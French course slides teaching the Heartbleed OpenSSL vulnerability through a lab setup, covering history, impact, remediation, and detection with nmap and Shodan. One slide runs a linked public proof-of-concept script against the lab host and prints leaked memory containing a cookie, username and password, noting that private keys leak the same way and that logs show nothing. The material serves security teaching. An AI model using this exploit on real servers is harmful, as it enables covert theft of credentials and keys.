## heartbleed

![heartbleed](images/heartbleed/heartbleed.png "heartbleed")


## un système vulnérable ...

[Ubuntu server 12.04.4](http://ubuntu-release.locaweb.com.br/12.04/)

```bash
sudo apt-get install nginx
```

### surtout pas d'upgrade pour garder des services vulnérables ;)

[paramétrage réseau](/zz2-f5-securite-logicielle-22-securite-des-applications-web.html#recreer-lenvironnement-de-cours-dans-virtualbox)


## architecture typique

* nginx route le traffic http (80/443)
  * vers d'autres serveurs web
    * dans notre cas une debian
      * avec apache

Note:
- appli node sur port exotique
- possibilité de filtrage de requête
- [load balancing](http://nginx.org/en/docs/http/load_balancing.html) pour pas cher
-  accessoirement nickel pour les migrations


## nginx

<pre>
<code data-trim class="hljs bash"  style="font-size: 23px; min-height: 560px">
upstream debian80 {
     server  172.16.76.144:80;
}
server {
     listen 80;
     server_name heart.bleed;
     # don't mess with security :p
     rewrite ^ https://heart.bleed$request_uri? permanent;
}
server {
     listen 443;
     server_name heart.bleed;
     ssl on;
     ssl_certificate /etc/nginx/ssl/keys/heartbleed.crt;
     ssl_certificate_key /etc/nginx/ssl/keys/heartbleed.key;
     location / {
          proxy_pass    http://debian80/;
          proxy_set_header  Host $http_host;
     }
}
</code>
</pre>


## heartbleed

* découverte en mars 2014
  * par Google & Codenomicon
  * présente depuis mars 2012
    * introduite à la suite d'un "bug fix" par un contributeur bénévole
      * validée le 31 décembre 2011
  * faille d'implémentation dans openssl


<div style="text-align: center">
  <img src="images/heartbleed/heartbleed_explanation_1.png"/>
</div>


<div style="text-align: center">
  <img src="images/heartbleed/heartbleed_explanation_2.png"/>
</div>


## impact

* [Bruce Schneier la positionne à 11 sur une échelle de 1 à 10](https://www.schneier.com/blog/archives/2014/04/heartbleed.html)
!["Bruce Schneier"](images/heartbleed/bruce-schneier-facts.jpg "Bruce Schneier")<!-- .element style="float: right; margin: 20px" width="25%" -->
* Qui savait?
  * Qui a pu exploiter?
    * [la NSA est soupçonnée par bloomberg d'avoir exploité la faille pendant 2 ans](https://www.bloomberg.com/news/articles/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers)


## impact

* touche tout ce qui utilise SSL/TLS
  * https
  * mail
    * imaps
    * pop3s
    * smtps
  * ftps
  * vpn
  * ...


## impact

touche beaucoup d'équipements aussi

!["Heartbleed device"](images/heartbleed/router_heartbleed.jpg "Heartbleed device")


## mesure curative

* mettre à jour ASAP
* révoquer et changer tous les certificats
* changer tous les mots de passe
  * Touche beaucoup de services web

!["Heartbleed impact"](images/heartbleed/impact_heartbleed.jpg "Heartbleed impact")

Note:
- Windows avec openSSH ne sera pas épargné au prochain tour


## timeline

* [Heartbleed - timeline](https://securityledger.com/2014/06/infographic-a-heartbleed-disclosure-timeline-secunia/heartbleed_infographic/)

* [CVE-2014-0160](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160)
    * CVE-2014-0346

Note:
- vitesse de distribution des patchs
    - temps de compilation et de distribution dans les paquets


## détection

* [<i class="fa fa-twitter"></i> shodan](https://twitter.com/shodanhq)
* [<i class="fa fa-newspaper-o"></i> shodan blog](http://blog.shodan.io/)
* [Heartbleed Early Shodan Search - port: 443 openssl 1.0.1](https://www.shodan.io/search?query=port%3A443+openssl+1.0.1)
* [Heartbleed CVE Shodan Search - vuln:cve-2014-0160](https://www.shodan.io/search?query=vuln%3A%21cve-2014-0160)
* [Heartbleed Shodan Report](https://www.shodan.io/report/XTx7BmP5)
* [Heartbleed Bug Health Report](https://zmap.io/heartbleed/)


## détection

```bash
$ nmap -p 443 --script=ssl-heartbleed heart.bleed
Starting Nmap (https://nmap.org) at 2015-10-20 12:10 EDT
Nmap scan report for heart.bleed (172.16.76.143)
Host is up (0.0014s latency).
rDNS record for 172.16.76.143: proxy
PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability
|   in the popular OpenSSL cryptographic software library.
```


### exploit <i class="fa fa-spinner fa-spin"></i>

* [<i class="fa fa-github"></i> akenn/hb-test.py](https://gist.github.com/akenn/10159084)
* [<i class="fa fa-newspaper-o"></i> Andrew Kennedy blog - Heartbleed](http://akenn.org/blog/Heartbleed/)
* [<i class="fa fa-gear"></i> https://heart.bleed ](https://heart.bleed )
  * nginx renvoie sur un formulaire d'authentification servi par apache en forçant https
    * authentifions nous


### exploit <i class="fa fa-spinner fa-spin"></i>

```bash
$ python hb-test.py heart.bleed > hb.dump \
  && cat hb.dump | tail -n +10 | head -n 40
00e0: 63 65 70 74 2D 4C 61 6E 67 75 61 67  ..Accept-Languag
00f0: 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E  e: en-US,en;q=0.
0100: 63 63 65 70 74 2D 45 6E 63 6F 64 69  5..Accept-Encodi
0110: 67 7A 69 70 2C 20 64 65 66 6C 61 74  ng: gzip, deflat
0120: 65 66 65 72 65 72 3A 20 68 74 74 70  e..Referer: http
0130: 68 65 61 72 74 2E 62 6C 65 65 64 2F  s://heart.bleed/
0140: 78 2E 68 74 6D 6C 0D 0A 43 6F 6F 6B  index.html..Cook
0150: 68 65 61 72 74 62 6C 65 65 64 3D 27  ie: heartbleed=
0160: 72 69 65 6E 64 73 21 27 0D 0A 43 6F  Hi friends!.use
01d0: 65 3D 6D 61 7A 65 6E 6F 76 69 26 70  rname=mazenovi&p
01e0: 6F 72 64 3D 6C 65 61 6B 65 64 70 61  assword=leakedpa
01f0: 48 95 77 37 7B E7 02 27 4D 8B 3C 2D  ss't.H.w7{..'M.<-
```

aucun signe de l'attaque dans les logs

Note:
- ca marche aussi avec les clés privées de serveurs
    - et avec tous les secrets qui passe par la mémoire du serveur
